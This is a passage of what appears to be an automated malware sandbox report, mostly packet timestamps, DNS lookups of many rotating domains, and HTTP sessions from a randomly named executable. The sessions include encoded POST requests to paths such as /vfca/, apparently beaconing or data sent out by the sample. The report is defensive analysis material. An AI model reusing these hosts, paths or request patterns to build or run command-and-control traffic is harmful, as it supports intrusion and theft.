                Jul 3, 2024 08:56:28.031529903 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.031569958 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.031577110 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.031723976 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.031764984 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.036952019 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.037247896 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.037260056 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.037324905 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.037928104 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.037942886 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.037971020 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.038808107 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.038824081 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.038853884 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.039849997 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.039864063 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.039875031 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.039907932 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.039927959 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.041672945 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.041935921 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.041971922 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.119703054 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.119946957 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.119960070 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.119991064 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.120569944 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.120582104 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.120616913 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.122313023 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.122354031 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.122647047 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.122658968 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.122694016 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.123234034 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.123250008 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.123292923 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.124174118 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.124190092 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.124228001 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.125154018 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.125168085 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.125178099 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.125211954 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.126127005 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.126143932 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.126178980 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.127603054 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.127645016 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.128021955 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.128034115 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.128078938 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.128675938 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.128690004 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.128735065 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.129622936 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.130264997 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.130305052 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.130476952 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.130489111 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.130525112 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.131251097 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.131536007 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.131552935 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:28.131573915 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.131593943 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.136352062 CEST4975480192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:28.142934084 CEST8049754208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:30.463450909 CEST8049753208.91.197.27192.168.2.9
                Jul 3, 2024 08:56:30.463512897 CEST4975380192.168.2.9208.91.197.27
                Jul 3, 2024 08:56:33.464360952 CEST4975580192.168.2.966.235.200.146
                Jul 3, 2024 08:56:33.473968983 CEST804975566.235.200.146192.168.2.9
                Jul 3, 2024 08:56:33.477876902 CEST4975580192.168.2.966.235.200.146
                Jul 3, 2024 08:56:33.481767893 CEST4975580192.168.2.966.235.200.146
                Jul 3, 2024 08:56:33.487205029 CEST804975566.235.200.146192.168.2.9
                Jul 3, 2024 08:56:34.201245070 CEST804975566.235.200.146192.168.2.9
                Jul 3, 2024 08:56:34.201256037 CEST804975566.235.200.146192.168.2.9
                Jul 3, 2024 08:56:34.201266050 CEST804975566.235.200.146192.168.2.9
                Jul 3, 2024 08:56:34.201329947 CEST4975580192.168.2.966.235.200.146
                Jul 3, 2024 08:56:34.985754013 CEST4975580192.168.2.966.235.200.146
                Jul 3, 2024 08:56:36.003880978 CEST4975680192.168.2.966.235.200.146
                Jul 3, 2024 08:56:36.011121035 CEST804975666.235.200.146192.168.2.9
                Jul 3, 2024 08:56:36.011198997 CEST4975680192.168.2.966.235.200.146
                Jul 3, 2024 08:56:36.014218092 CEST4975680192.168.2.966.235.200.146
                Jul 3, 2024 08:56:36.019128084 CEST804975666.235.200.146192.168.2.9
                Jul 3, 2024 08:56:36.741837025 CEST804975666.235.200.146192.168.2.9
                Jul 3, 2024 08:56:36.743233919 CEST804975666.235.200.146192.168.2.9
                Jul 3, 2024 08:56:36.743324995 CEST804975666.235.200.146192.168.2.9
                Jul 3, 2024 08:56:36.743343115 CEST4975680192.168.2.966.235.200.146
                Jul 3, 2024 08:56:36.743451118 CEST4975680192.168.2.966.235.200.146
                Jul 3, 2024 08:56:37.532893896 CEST4975680192.168.2.966.235.200.146
                Jul 3, 2024 08:56:38.549336910 CEST4975780192.168.2.966.235.200.146
                Jul 3, 2024 08:56:38.823888063 CEST804975766.235.200.146192.168.2.9
                Jul 3, 2024 08:56:38.823978901 CEST4975780192.168.2.966.235.200.146
                Jul 3, 2024 08:56:38.826242924 CEST4975780192.168.2.966.235.200.146
                Jul 3, 2024 08:56:38.831223965 CEST804975766.235.200.146192.168.2.9
                Jul 3, 2024 08:56:38.831240892 CEST804975766.235.200.146192.168.2.9
                Jul 3, 2024 08:56:39.743156910 CEST804975766.235.200.146192.168.2.9
                Jul 3, 2024 08:56:39.743175030 CEST804975766.235.200.146192.168.2.9
                Jul 3, 2024 08:56:39.743237972 CEST4975780192.168.2.966.235.200.146
                Jul 3, 2024 08:56:39.743269920 CEST804975766.235.200.146192.168.2.9
                Jul 3, 2024 08:56:39.743319035 CEST4975780192.168.2.966.235.200.146
                Jul 3, 2024 08:56:40.327579021 CEST4975780192.168.2.966.235.200.146
                Jul 3, 2024 08:56:41.346657991 CEST4975880192.168.2.966.235.200.146
                Jul 3, 2024 08:56:41.351687908 CEST804975866.235.200.146192.168.2.9
                Jul 3, 2024 08:56:41.353949070 CEST4975880192.168.2.966.235.200.146
                Jul 3, 2024 08:56:41.357758045 CEST4975880192.168.2.966.235.200.146
                Jul 3, 2024 08:56:41.362637043 CEST804975866.235.200.146192.168.2.9
                Jul 3, 2024 08:56:42.050311089 CEST804975866.235.200.146192.168.2.9
                Jul 3, 2024 08:56:42.050714970 CEST804975866.235.200.146192.168.2.9
                Jul 3, 2024 08:56:42.050755978 CEST4975880192.168.2.966.235.200.146
                Jul 3, 2024 08:56:42.064095020 CEST4975880192.168.2.966.235.200.146
                Jul 3, 2024 08:56:42.068914890 CEST804975866.235.200.146192.168.2.9
                Jul 3, 2024 08:56:50.128971100 CEST4975980192.168.2.923.111.180.146
                Jul 3, 2024 08:56:50.133819103 CEST804975923.111.180.146192.168.2.9
                Jul 3, 2024 08:56:50.133897066 CEST4975980192.168.2.923.111.180.146
                Jul 3, 2024 08:56:50.135997057 CEST4975980192.168.2.923.111.180.146
                Jul 3, 2024 08:56:50.140763998 CEST804975923.111.180.146192.168.2.9
                Jul 3, 2024 08:56:50.652805090 CEST804975923.111.180.146192.168.2.9
                Jul 3, 2024 08:56:50.652911901 CEST804975923.111.180.146192.168.2.9
                Jul 3, 2024 08:56:50.654280901 CEST4975980192.168.2.923.111.180.146
                Jul 3, 2024 08:56:50.659586906 CEST4975980192.168.2.923.111.180.146
                Jul 3, 2024 08:56:50.664756060 CEST804975923.111.180.146192.168.2.9
                Jul 3, 2024 08:56:55.675471067 CEST4976080192.168.2.9103.197.25.241
                Jul 3, 2024 08:56:55.680604935 CEST8049760103.197.25.241192.168.2.9
                Jul 3, 2024 08:56:55.680687904 CEST4976080192.168.2.9103.197.25.241
                Jul 3, 2024 08:56:55.682832003 CEST4976080192.168.2.9103.197.25.241
                Jul 3, 2024 08:56:55.687711954 CEST8049760103.197.25.241192.168.2.9
                Jul 3, 2024 08:56:56.594702959 CEST8049760103.197.25.241192.168.2.9
                Jul 3, 2024 08:56:56.594786882 CEST8049760103.197.25.241192.168.2.9
                Jul 3, 2024 08:56:56.594856024 CEST4976080192.168.2.9103.197.25.241
                Jul 3, 2024 08:56:57.671345949 CEST4976080192.168.2.9103.197.25.241

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 3, 2024 08:53:24.588613033 CEST5027253192.168.2.91.1.1.1
                Jul 3, 2024 08:53:24.831929922 CEST53502721.1.1.1192.168.2.9
                Jul 3, 2024 08:53:40.470069885 CEST6282253192.168.2.91.1.1.1
                Jul 3, 2024 08:53:40.481149912 CEST53628221.1.1.1192.168.2.9
                Jul 3, 2024 08:53:54.330598116 CEST5658653192.168.2.91.1.1.1
                Jul 3, 2024 08:53:54.371467113 CEST53565861.1.1.1192.168.2.9
                Jul 3, 2024 08:54:07.674539089 CEST5356653192.168.2.91.1.1.1
                Jul 3, 2024 08:54:07.688396931 CEST53535661.1.1.1192.168.2.9
                Jul 3, 2024 08:54:15.752763987 CEST6484853192.168.2.91.1.1.1
                Jul 3, 2024 08:54:15.763453007 CEST53648481.1.1.1192.168.2.9
                Jul 3, 2024 08:54:29.049520969 CEST5483053192.168.2.91.1.1.1
                Jul 3, 2024 08:54:29.059401035 CEST53548301.1.1.1192.168.2.9
                Jul 3, 2024 08:54:37.113199949 CEST6099653192.168.2.91.1.1.1
                Jul 3, 2024 08:54:37.142033100 CEST53609961.1.1.1192.168.2.9
                Jul 3, 2024 08:54:50.424416065 CEST6463653192.168.2.91.1.1.1
                Jul 3, 2024 08:54:50.440752029 CEST53646361.1.1.1192.168.2.9
                Jul 3, 2024 08:54:58.516880989 CEST5386153192.168.2.91.1.1.1
                Jul 3, 2024 08:54:58.524456978 CEST53538611.1.1.1192.168.2.9
                Jul 3, 2024 08:55:12.881217003 CEST5830353192.168.2.91.1.1.1
                Jul 3, 2024 08:55:12.900590897 CEST53583031.1.1.1192.168.2.9
                Jul 3, 2024 08:55:26.346579075 CEST6237053192.168.2.91.1.1.1
                Jul 3, 2024 08:55:26.540350914 CEST53623701.1.1.1192.168.2.9
                Jul 3, 2024 08:55:39.819431067 CEST6264753192.168.2.91.1.1.1
                Jul 3, 2024 08:55:40.012322903 CEST53626471.1.1.1192.168.2.9
                Jul 3, 2024 08:55:53.425735950 CEST6415853192.168.2.91.1.1.1
                Jul 3, 2024 08:55:53.435292959 CEST53641581.1.1.1192.168.2.9
                Jul 3, 2024 08:56:01.503779888 CEST5194453192.168.2.91.1.1.1
                Jul 3, 2024 08:56:02.082993031 CEST53519441.1.1.1192.168.2.9
                Jul 3, 2024 08:56:15.770952940 CEST5942553192.168.2.91.1.1.1
                Jul 3, 2024 08:56:16.012361050 CEST53594251.1.1.1192.168.2.9
                Jul 3, 2024 08:56:33.145759106 CEST6240653192.168.2.91.1.1.1
                Jul 3, 2024 08:56:33.457642078 CEST53624061.1.1.1192.168.2.9

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 3, 2024 08:53:24.588613033 CEST192.168.2.91.1.1.10x25c7Standard query (0)www.highwavesmarine.comA (IP address)IN (0x0001)false
                Jul 3, 2024 08:53:40.470069885 CEST192.168.2.91.1.1.10x41a7Standard query (0)www.dxgsf.shopA (IP address)IN (0x0001)false
                Jul 3, 2024 08:53:54.330598116 CEST192.168.2.91.1.1.10xc296Standard query (0)www.dennisrosenberg.studioA (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:07.674539089 CEST192.168.2.91.1.1.10xf224Standard query (0)www.shoplifestylebrand.comA (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:15.752763987 CEST192.168.2.91.1.1.10x30bcStandard query (0)www.ennerdaledevcons.co.ukA (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:29.049520969 CEST192.168.2.91.1.1.10x5947Standard query (0)www.neworldelectronic.comA (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:37.113199949 CEST192.168.2.91.1.1.10x3b8Standard query (0)www.artemhypnotherapy.comA (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:50.424416065 CEST192.168.2.91.1.1.10x34f0Standard query (0)www.todosneaker.comA (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:58.516880989 CEST192.168.2.91.1.1.10x35dcStandard query (0)www.mocar.proA (IP address)IN (0x0001)false
                Jul 3, 2024 08:55:12.881217003 CEST192.168.2.91.1.1.10x60ceStandard query (0)www.evertudy.xyzA (IP address)IN (0x0001)false
                Jul 3, 2024 08:55:26.346579075 CEST192.168.2.91.1.1.10xe524Standard query (0)www.luo918.comA (IP address)IN (0x0001)false
                Jul 3, 2024 08:55:39.819431067 CEST192.168.2.91.1.1.10xd49Standard query (0)www.fungusbus.comA (IP address)IN (0x0001)false
                Jul 3, 2024 08:55:53.425735950 CEST192.168.2.91.1.1.10x1db0Standard query (0)www.newzionocala.comA (IP address)IN (0x0001)false
                Jul 3, 2024 08:56:01.503779888 CEST192.168.2.91.1.1.10x1da8Standard query (0)www.qe1jqiste.sbsA (IP address)IN (0x0001)false
                Jul 3, 2024 08:56:15.770952940 CEST192.168.2.91.1.1.10x9f17Standard query (0)www.thesprinklesontop.comA (IP address)IN (0x0001)false
                Jul 3, 2024 08:56:33.145759106 CEST192.168.2.91.1.1.10x2fa8Standard query (0)www.stefanogaus.comA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 3, 2024 08:53:24.831929922 CEST1.1.1.1192.168.2.90x25c7No error (0)www.highwavesmarine.com23.111.180.146A (IP address)IN (0x0001)false
                Jul 3, 2024 08:53:40.481149912 CEST1.1.1.1192.168.2.90x41a7No error (0)www.dxgsf.shopdxgsf.shopCNAME (Canonical name)IN (0x0001)false
                Jul 3, 2024 08:53:40.481149912 CEST1.1.1.1192.168.2.90x41a7No error (0)dxgsf.shop103.197.25.241A (IP address)IN (0x0001)false
                Jul 3, 2024 08:53:54.371467113 CEST1.1.1.1192.168.2.90xc296No error (0)www.dennisrosenberg.studioparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                Jul 3, 2024 08:53:54.371467113 CEST1.1.1.1192.168.2.90xc296No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:07.688396931 CEST1.1.1.1192.168.2.90xf224Name error (3)www.shoplifestylebrand.comnonenoneA (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:15.763453007 CEST1.1.1.1192.168.2.90x30bcNo error (0)www.ennerdaledevcons.co.uk212.227.172.254A (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:29.059401035 CEST1.1.1.1192.168.2.90x5947Name error (3)www.neworldelectronic.comnonenoneA (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:37.142033100 CEST1.1.1.1192.168.2.90x3b8No error (0)www.artemhypnotherapy.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                Jul 3, 2024 08:54:37.142033100 CEST1.1.1.1192.168.2.90x3b8No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:50.440752029 CEST1.1.1.1192.168.2.90x34f0Name error (3)www.todosneaker.comnonenoneA (IP address)IN (0x0001)false
                Jul 3, 2024 08:54:58.524456978 CEST1.1.1.1192.168.2.90x35dcNo error (0)www.mocar.promocar.proCNAME (Canonical name)IN (0x0001)false
                Jul 3, 2024 08:54:58.524456978 CEST1.1.1.1192.168.2.90x35dcNo error (0)mocar.pro109.95.158.122A (IP address)IN (0x0001)false
                Jul 3, 2024 08:55:12.900590897 CEST1.1.1.1192.168.2.90x60ceNo error (0)www.evertudy.xyz203.161.49.220A (IP address)IN (0x0001)false
                Jul 3, 2024 08:55:26.540350914 CEST1.1.1.1192.168.2.90xe524No error (0)www.luo918.com35.227.248.111A (IP address)IN (0x0001)false
                Jul 3, 2024 08:55:40.012322903 CEST1.1.1.1192.168.2.90xd49No error (0)www.fungusbus.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                Jul 3, 2024 08:55:40.012322903 CEST1.1.1.1192.168.2.90xd49No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                Jul 3, 2024 08:55:53.435292959 CEST1.1.1.1192.168.2.90x1db0Name error (3)www.newzionocala.comnonenoneA (IP address)IN (0x0001)false
                Jul 3, 2024 08:56:02.082993031 CEST1.1.1.1192.168.2.90x1da8No error (0)www.qe1jqiste.sbsxiaoyue.zhuangkou.comCNAME (Canonical name)IN (0x0001)false
                Jul 3, 2024 08:56:02.082993031 CEST1.1.1.1192.168.2.90x1da8No error (0)xiaoyue.zhuangkou.com47.239.13.172A (IP address)IN (0x0001)false
                Jul 3, 2024 08:56:16.012361050 CEST1.1.1.1192.168.2.90x9f17No error (0)www.thesprinklesontop.com208.91.197.27A (IP address)IN (0x0001)false
                Jul 3, 2024 08:56:33.457642078 CEST1.1.1.1192.168.2.90x2fa8No error (0)www.stefanogaus.comstefanogaus.comCNAME (Canonical name)IN (0x0001)false
                Jul 3, 2024 08:56:33.457642078 CEST1.1.1.1192.168.2.90x2fa8No error (0)stefanogaus.com66.235.200.146A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • www.highwavesmarine.com
                • www.dxgsf.shop
                • www.dennisrosenberg.studio
                • www.ennerdaledevcons.co.uk
                • www.artemhypnotherapy.com
                • www.mocar.pro
                • www.evertudy.xyz
                • www.luo918.com
                • www.fungusbus.com
                • www.qe1jqiste.sbs
                • www.thesprinklesontop.com
                • www.stefanogaus.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.94971323.111.180.146801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:53:24.844984055 CEST477OUTGET /vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== HTTP/1.1
                Host: www.highwavesmarine.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:53:25.374732018 CEST193INHTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:53:25 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 10File not found.0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.949714103.197.25.241801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:53:40.500763893 CEST722OUTPOST /vfca/ HTTP/1.1
                Host: www.dxgsf.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dxgsf.shop
                Referer: http://www.dxgsf.shop/vfca/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 52 4c 63 4d 50 54 47 42 7a 6e 54 31 69 78 6e 6e 37 54 56 41 72 49 46 41 4c 69 6e 66 56 53 52 71 79 45 72 41 67 5a 51 49 35 78 4e 30 52 46 53 77 52 70 4b 48 5a 2f 46 42 39 2f 42 49 48 6d 65 6a 72 58 30 77 4d 35 52 73 35 52 31 63 67 4e 37 70 72 71 74 69 7a 2b 6d 6b 62 74 54 50 75 4a 50 51 73 75 79 4a 67 30 34 52 34 78 43 50 35 62 4f 70 65 74 46 36 34 6b 37 47 72 42 47 33 6d 65 37 61 58 65 48 52 50 44 4e 77 59 73 48 33 39 6b 61 4c 6f 39 76 6a 36 51 6a 4b 42 45 6a 36 4c 66 48 78 54 76 4b 48 6a 4e 2f 42 6e 33 54 5a 53 2f 6e 38
                Data Ascii: hH=ChGtZ61rPNgdRLcMPTGBznT1ixnn7TVArIFALinfVSRqyErAgZQI5xN0RFSwRpKHZ/FB9/BIHmejrX0wM5Rs5R1cgN7prqtiz+mkbtTPuJPQsuyJg04R4xCP5bOpetF64k7GrBG3me7aXeHRPDNwYsH39kaLo9vj6QjKBEj6LfHxTvKHjN/Bn3TZS/n8
                Jul 3, 2024 08:53:41.404473066 CEST289INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 06:53:41 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.949715103.197.25.241801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:53:43.084183931 CEST746OUTPOST /vfca/ HTTP/1.1
                Host: www.dxgsf.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dxgsf.shop
                Referer: http://www.dxgsf.shop/vfca/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 51 6f 45 4d 4e 30 79 42 6b 33 54 32 74 52 6e 6e 68 6a 56 45 72 49 5a 41 4c 6e 65 45 41 77 46 71 79 68 58 41 68 63 77 49 30 52 4e 30 61 6c 53 35 66 4a 4c 4a 5a 2f 4a 7a 39 2b 52 49 48 69 2b 6a 72 57 45 77 4d 4f 46 72 34 42 31 6b 73 74 37 52 76 71 74 69 7a 2b 6d 6b 62 74 32 6f 75 4a 58 51 73 65 43 4a 67 51 4d 53 30 52 43 4d 75 72 4f 70 55 4e 46 32 34 6b 37 6f 72 45 75 4a 6d 63 7a 61 58 62 6a 52 49 52 6c 7a 53 73 48 35 79 45 62 66 6e 74 61 70 79 69 58 45 42 48 48 32 52 4f 6e 74 5a 75 71 5a 79 2f 32 61 79 67 54 2b 56 59 75 55 57 55 35 78 33 4a 53 6c 63 47 74 46 70 6c 41 66 35 38 4c 52 71 77 3d 3d
                Data Ascii: hH=ChGtZ61rPNgdQoEMN0yBk3T2tRnnhjVErIZALneEAwFqyhXAhcwI0RN0alS5fJLJZ/Jz9+RIHi+jrWEwMOFr4B1kst7Rvqtiz+mkbt2ouJXQseCJgQMS0RCMurOpUNF24k7orEuJmczaXbjRIRlzSsH5yEbfntapyiXEBHH2ROntZuqZy/2aygT+VYuUWU5x3JSlcGtFplAf58LRqw==
                Jul 3, 2024 08:53:43.992197990 CEST289INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 06:53:43 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.949717103.197.25.241801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:53:45.668262959 CEST1759OUTPOST /vfca/ HTTP/1.1
                Host: www.dxgsf.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dxgsf.shop
                Referer: http://www.dxgsf.shop/vfca/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
